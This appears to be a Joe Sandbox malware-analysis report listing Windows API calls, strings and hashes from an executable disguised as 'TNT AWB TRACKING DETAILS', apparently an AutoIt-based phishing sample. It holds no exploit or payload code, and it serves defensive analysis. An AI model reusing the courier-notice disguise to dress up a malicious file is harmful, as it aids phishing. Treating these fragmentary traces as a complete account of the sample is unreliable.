                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1976180769-4113822522
                                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                      • String ID:
                                      • API String ID: 461458858-0
                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                      • DeleteObject.GDI32(?), ref: 004301D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3969911579-0
                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                      • String ID: 0
                                      • API String ID: 956284711-4108050209
                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 1965227024-3771769585
                                      • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                      • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 369157077-1007645807
                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                      APIs
                                      • GetParent.USER32 ref: 00445BF8
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                      • __wcsicoll.LIBCMT ref: 00445C33
                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 3125838495-3381328864
                                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                      APIs
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                      • _wcscpy.LIBCMT ref: 004787E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 3052893215-2127371420
                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                      • __swprintf.LIBCMT ref: 0045E7F7
                                      • _wprintf.LIBCMT ref: 0045E8B3
                                      • _wprintf.LIBCMT ref: 0045E8D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-2354261254
                                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 3038501623-2263619337
                                      • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                      • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                      • __swprintf.LIBCMT ref: 0045E5F6
                                      • _wprintf.LIBCMT ref: 0045E6A3
                                      • _wprintf.LIBCMT ref: 0045E6C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-8599901
                                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                      APIs
                                      • timeGetTime.WINMM ref: 00443B67
                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                      • String ID: BUTTON
                                      • API String ID: 1834419854-3405671355
                                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                      • LoadStringW.USER32(00000000), ref: 00454040
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • _wprintf.LIBCMT ref: 00454074
                                      • __swprintf.LIBCMT ref: 004540A3
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 455036304-4153970271
                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                      • _memmove.LIBCMT ref: 00467EB8
                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                      • _memmove.LIBCMT ref: 00467F6C
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
